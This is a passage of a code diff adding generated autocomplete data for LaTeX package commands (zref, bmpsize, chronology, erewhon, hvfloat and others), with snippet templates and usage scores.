'chronosys-cmd', + score: 0.2864294797053033, + }, + ], + newfloat: [ + { + caption: '\\DeclareFloatingEnvironment[]{}', + snippet: '\\DeclareFloatingEnvironment[$1]{$2}', + meta: 'newfloat-cmd', + score: 2.603029874713569e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'newfloat-cmd', + score: 0.00037306820619479756, + }, + ], + zref: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'zref-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'zref-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'zref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'zref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'zref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'zref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'zref-cmd', + score: 0.002958865219480927, + }, + ], + bmpsize: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'bmpsize-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bmpsize-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bmpsize-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'bmpsize-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'bmpsize-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'bmpsize-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'bmpsize-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'bmpsize-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'bmpsize-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'bmpsize-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bmpsize-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'bmpsize-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'bmpsize-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'bmpsize-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'bmpsize-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'bmpsize-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bmpsize-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bmpsize-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bmpsize-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'bmpsize-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'bmpsize-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bmpsize-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bmpsize-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'bmpsize-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'bmpsize-cmd', + score: 0.021170869458413965, + }, + ], + steinmetz: [ + { + caption: '\\Line', + snippet: '\\Line', + meta: 'steinmetz-cmd', + score: 0.0006078790177929149, + }, + { + caption: '\\polygon', + snippet: '\\polygon', + meta: 'steinmetz-cmd', + score: 0.0008987552240147395, + }, + { + caption: '\\line', + snippet: '\\line', + meta: 'steinmetz-cmd', + score: 0.014519741542622297, + }, + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'steinmetz-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\vector', + snippet: '\\vector', + meta: 'steinmetz-cmd', + score: 0.002970308722584179, + }, + ], + pageslts: [ + { + caption: '\\thepage', + snippet: '\\thepage', + meta: 'pageslts-cmd', + score: 0.0591555998103519, + }, + { + caption: '\\pagenumbering{}', + snippet: '\\pagenumbering{$1}', + meta: 'pageslts-cmd', + score: 0.06731737633021802, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'pageslts-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\global', + snippet: '\\global', + meta: 'pageslts-cmd', + score: 0.006609629561859019, + }, + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'pageslts-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\index{}', + snippet: '\\index{$1}', + meta: 'pageslts-cmd', + score: 0.013774721817648336, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'pageslts-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'pageslts-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pageslts-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pageslts-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pageslts-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pageslts-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pageslts-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pageslts-cmd', + score: 0.008565354665444157, + }, + ], + chronology: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'chronology-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'chronology-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'chronology-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'chronology-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'chronology-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'chronology-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'chronology-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'chronology-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronology-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chronology-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'chronology-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chronology-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chronology-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chronology-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chronology-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chronology-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronology-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chronology-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chronology-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chronology-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chronology-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chronology-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chronology-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chronology-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chronology-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chronology-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chronology-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chronology-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chronology-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chronology-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chronology-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chronology-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chronology-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chronology-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chronology-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chronology-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chronology-cmd', + score: 0.2864294797053033, + }, + ], + spreadtab: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'spreadtab-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'spreadtab-cmd', + score: 0.021170869458413965, + }, + ], + algpascal: [ + { + caption: '\\algrenewcommand', + snippet: '\\algrenewcommand', + meta: 'algpascal-cmd', + score: 0.0019861803661869416, + }, + { + caption: '\\Statex', + snippet: '\\Statex', + meta: 'algpascal-cmd', + score: 0.008622777195102994, + }, + { + caption: '\\BState{}', + snippet: '\\BState{$1}', + meta: 'algpascal-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\BState', + snippet: '\\BState', + meta: 'algpascal-cmd', + score: 0.0008685861525307122, + }, + { + caption: '\\algloopdefx{}[][]{}', + snippet: '\\algloopdefx{$1}[$2][$3]{$4}', + meta: 'algpascal-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algnewcommand', + snippet: '\\algnewcommand', + meta: 'algpascal-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\algnewcommand{}[]{}', + snippet: '\\algnewcommand{$1}[$2]{$3}', + meta: 'algpascal-cmd', + score: 0.0030209395012065327, + }, + { + caption: '\\Comment{}', + snippet: '\\Comment{$1}', + meta: 'algpascal-cmd', + score: 0.005178604573219454, + }, + { + caption: '\\algblockdefx{}{}[]', + snippet: '\\algblockdefx{$1}{$2}[$3]', + meta: 'algpascal-cmd', + score: 0.00025315185701145097, + }, + { + caption: '\\algrenewtext{}{}', + snippet: '\\algrenewtext{$1}{$2}', + meta: 'algpascal-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algrenewtext{}[]{}', + snippet: '\\algrenewtext{$1}[$2]{$3}', + meta: 'algpascal-cmd', + score: 0.0024415580558825975, + }, + { + caption: '\\algblock{}{}', + snippet: '\\algblock{$1}{$2}', + meta: 'algpascal-cmd', + score: 0.0007916858220314837, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'algpascal-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\algdef{}[]{}{}{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'algpascal-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}{}[]{}{}', + snippet: '\\algdef{$1}[$2]{$3}{$4}[$5]{$6}{$7}', + meta: 'algpascal-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algdef{}[]{}[]{}', + snippet: '\\algdef{$1}[$2]{$3}[$4]{$5}', + meta: 'algpascal-cmd', + score: 0.0003102486920966127, + }, + { + caption: '\\algtext{}', + snippet: '\\algtext{$1}', + meta: 'algpascal-cmd', + score: 0.0005463612015579842, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'algpascal-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'algpascal-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'algpascal-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'algpascal-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'algpascal-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'algpascal-cmd', + score: 0.0018957469739775527, + }, + ], + cabin: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'cabin-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'cabin-cmd', + score: 0.008565354665444157, + }, + ], + erewhon: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'erewhon-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'erewhon-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'erewhon-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'erewhon-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'erewhon-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'erewhon-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'erewhon-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'erewhon-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\robustify{}', + snippet: '\\robustify{$1}', + meta: 'erewhon-cmd', + score: 0.002671974990314091, + }, + { + caption: '\\setbool{}{}', + snippet: '\\setbool{$1}{$2}', + meta: 'erewhon-cmd', + score: 0.00023171033119130004, + }, + { + caption: '\\ifdefempty{}{}{}', + snippet: '\\ifdefempty{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 7.482069221111606e-5, + }, + { + caption: '\\apptocmd{}{}{}{}', + snippet: '\\apptocmd{$1}{$2}{$3}{$4}', + meta: 'erewhon-cmd', + score: 0.00035805058319299113, + }, + { + caption: '\\ifstrequal{}{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}{$4}', + meta: 'erewhon-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\ifstrequal{}{}{}', + snippet: '\\ifstrequal{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 0.00041307691354437894, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'erewhon-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\csedef{}{}', + snippet: '\\csedef{$1}{$2}', + meta: 'erewhon-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'erewhon-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\newrobustcmd{}[]{}', + snippet: '\\newrobustcmd{$1}[$2]{$3}', + meta: 'erewhon-cmd', + score: 0.0006607703576475988, + }, + { + caption: '\\ifdefstring{}{}{}{}', + snippet: '\\ifdefstring{$1}{$2}{$3}{$4}', + meta: 'erewhon-cmd', + score: 0.0006796212875843042, + }, + { + caption: '\\ifbool{}{}{}', + snippet: '\\ifbool{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\patchcmd{}{}{}{}{}', + snippet: '\\patchcmd{$1}{$2}{$3}{$4}{$5}', + meta: 'erewhon-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\patchcmd', + snippet: '\\patchcmd', + meta: 'erewhon-cmd', + score: 0.002560998917940627, + }, + { + caption: '\\preto{}{}', + snippet: '\\preto{$1}{$2}', + meta: 'erewhon-cmd', + score: 8.860754525300578e-5, + }, + { + caption: '\\ifnumcomp{}{}{}{}{}', + snippet: '\\ifnumcomp{$1}{$2}{$3}{$4}{$5}', + meta: 'erewhon-cmd', + score: 0.00029867998381154486, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'erewhon-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\newbool{}', + snippet: '\\newbool{$1}', + meta: 'erewhon-cmd', + score: 7.723677706376668e-5, + }, + { + caption: '\\AtBeginEnvironment{}{}', + snippet: '\\AtBeginEnvironment{$1}{$2}', + meta: 'erewhon-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\pretocmd{}{}{}{}', + snippet: '\\pretocmd{$1}{$2}{$3}{$4}', + meta: 'erewhon-cmd', + score: 0.00028992557275763024, + }, + { + caption: '\\ifundef{}{}{}', + snippet: '\\ifundef{$1}{$2}{$3}', + meta: 'erewhon-cmd', + score: 0.00014933999190577243, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'erewhon-cmd', + score: 0.008565354665444157, + }, + ], + tgcursor: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgcursor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgcursor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgcursor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgcursor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tgcursor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgcursor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tgcursor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'tgcursor-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tgcursor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tgcursor-cmd', + score: 0.021170869458413965, + }, + ], + ifvtex: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ifvtex-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'ifvtex-cmd', + score: 0.002958865219480927, + }, + ], + memhfixc: [ + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'memhfixc-cmd', + score: 1.2569477427490174, + }, + ], + longfigure: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'longfigure-cmd', + score: 0.3277033727934986, + }, + ], + lato: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'lato-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'lato-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'lato-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'lato-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'lato-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'lato-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\scshape', + snippet: '\\scshape', + meta: 'lato-cmd', + score: 0.05364108855914402, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'lato-cmd', + score: 0.00037306820619479756, + }, + ], + authoraftertitle: [ + { + caption: '\\author{}', + snippet: '\\author{$1}', + meta: 'authoraftertitle-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\author[]{}', + snippet: '\\author[$1]{$2}', + meta: 'authoraftertitle-cmd', + score: 0.8973590434087177, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'authoraftertitle-cmd', + score: 0.9202908262245683, + }, + ], + listofsymbols: [ + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'listofsymbols-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'listofsymbols-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'listofsymbols-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'listofsymbols-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'listofsymbols-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'listofsymbols-cmd', + score: 0.0018957469739775527, + }, + ], + hvfloat: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hvfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'hvfloat-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'hvfloat-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'hvfloat-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionof{}{}', + snippet: '\\captionof{$1}{$2}', + meta: 'hvfloat-cmd', + score: 0.018348594199161503, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'hvfloat-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'hvfloat-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hvfloat-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'hvfloat-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'hvfloat-cmd', + score: 0.422097569591803, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hvfloat-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\hspace{}', + snippet: '\\hspace{$1}', + meta: 'hvfloat-cmd', + score: 0.3147206476372336, + }, + { + caption: '\\caption{}', + snippet: '\\caption{$1}', + meta: 'hvfloat-cmd', + score: 1.2569477427490174, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'hvfloat-cmd', + score: 1.897791904799601, + }, + { + caption: '\\ContinuedFloat', + snippet: '\\ContinuedFloat', + meta: 'hvfloat-cmd', + score: 5.806935368083486e-5, + }, + { + caption: '\\noindent', + snippet: '\\noindent', + meta: 'hvfloat-cmd', + score: 0.42355747798114207, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hvfloat-cmd', + 